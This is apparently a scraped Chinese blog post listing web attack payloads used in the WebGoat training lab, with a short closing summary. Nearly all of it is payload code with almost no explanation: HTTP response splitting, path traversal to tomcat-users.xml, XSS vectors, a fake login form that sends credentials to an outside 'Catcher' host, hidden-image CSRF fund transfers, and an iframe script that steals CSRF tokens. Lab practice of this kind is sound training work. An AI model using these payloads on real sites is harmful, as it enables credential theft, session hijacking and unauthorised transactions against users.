原创作品,允许转载,转载时请务必以超链接形式标明文章
原始出处 、作者信息和本声明。否则将追究法律责任。
http://shelia.blog.51cto.com/2930476/1626479
|
1
|
cn%0aContent-length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-length:30%0a<
html
>Haha</
html
>
|
|
1
|
cn%0aContent-length:%200%0a%0aHTTP/1.1%20200%20OK%0aLast-Modified:%20Thu,%2001%20Jan%204099%2012:00:00%20GMT%20%20%20%0aContent-Type:%20text/html%0aContent-length:30%0a<
html
>Haha</
html
>
|
|
1
|
../../../../../../../etc/tomcat6/tomcat-users.xml
|
|
1
|
<
img
src
=
"/webgoat/images/logos/owasp.jpg"
></
img
>
|
|
1
2
|
<
img
src
=
"/webgoat/images/logos/owasp.jpg"
onerror
=
"javascript:alert(/xss/)"
></
img
>
onmouseover......
|
|
1
|
<
a
onclick
=
"javascript:alert(/xss/)"
>haha</
a
>
|
|
1
|
<
a
onclick
=
"javascript:eval(document.location.href='http://www.baidu.com')"
>haha</
a
>
|
|
1
|
<
iframe
src
=
"javascript:alert(/xss/)"
></
iframe
>
|
|
1
|
Please enter your password:<
br
><
input
type
=
"password"
id
=
"passwd"
><
br
><
button
onClick
=
"javascript:alert('I have your password: ' + pass.value);"
>Submit</
button
>
|
|
1
2
3
4
|
function
displayGreeting(name) {
if
(name !=
''
){
document.getElementById(
"greeting"
).innerHTML=
"Hello, "
+ escapeHTML(name); +
"!"
;
}
|
|
1
|
<
h1
id
=
"greeting"
>Hello, <a onclick="javascript:alert(/xss/)">haha</a></
h1
>
|
|
1
|
javascript:submitData(666,10000)
|
|
1
|
123"');alert(document.cookie);
//
|
|
1
|
</
form
><
br
><
br
><
br
><
hr
><
form
action
=
"http://xx.xx.xx.xx/webgoat/Catcher"
method
=
"get"
><
h3
>This feature requires account login:<
h3
><
br
><
input
type
=
"text"
name
=
"PROPERTY"
value
=
"yes"
hidden
=
""
><
br
>Enter username: <
input
type
=
"text"
name
=
"user"
><
br
>Enter password: <
input
type
=
"password"
name
=
"password"
><
br
> <
input
type
=
"submit"
value
=
"Login"
name
=
"submit"
></
form
>
|
|
1
|
<
img
src
=
"http://192.168.6.134/WebGoat/attack?Screen=888&menu=900&Num=6&transferFunds=4000"
width
=
"1"
height
=
"1"
><
img
>
|
|
1
2
3
|
<
img
src
=
"http://XX.XX.XX.XX/WebGoat/attack?Screen=881&menu=900&transferFunds=5000"
onerror
=
"document.getElementById('imgConfirm').src='http://XX.XX.XX.XX/WebGoat/attack?Screen=881&menu=900&transferFunds=CONFIRM'"
width
=
"1"
height
=
"1"
/>
<
img
id
=
"imgConfirm"
width
=
"1"
height
=
"1"
/>
|
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
<
script
>
var tokenvalue;
function readFrame1()
{
var frameDoc = document.getElementById("frame1").contentDocument;
var form = frameDoc.getElementsByTagName("form")[1];
var token = form.CSRFToken.value;
tokenvalue = '&CSRFToken='+token;
loadFrame2();
}
function loadFrame2()
{
var testFrame = document.getElementById("frame2");
testFrame.src="http://xx.xx.xx.xx/WebGoat/attack?Screen=838&menu=900&transferFunds=4000"+tokenvalue;
}
</
script
>
<
iframe
src
=
"http://xx.xx.xx.xx/WebGoat/attack?Screen=838&menu=900&transferFunds=main"
onload
=
"readFrame1();"
id
=
"frame1"
frameborder
=
"1"
marginwidth
=
"0"
marginheight
=
"0"
width
=
"1"
scrolling
=
yes
height
=
"1"
></
iframe
>
<
iframe
id
=
"frame2"
frameborder
=
"1"
marginwidth
=
"0"
marginheight
=
"0"
width
=
"1"
scrolling
=
yes
height
=
"1"
></
iframe
>
|
本文详细介绍如何在WebGoat环境中实践多种Web安全漏洞,包括跨站脚本攻击(XSS)、路径遍历、AJAX安全问题等,并提供具体步骤与示例代码。
908

被折叠的 条评论
为什么被折叠?



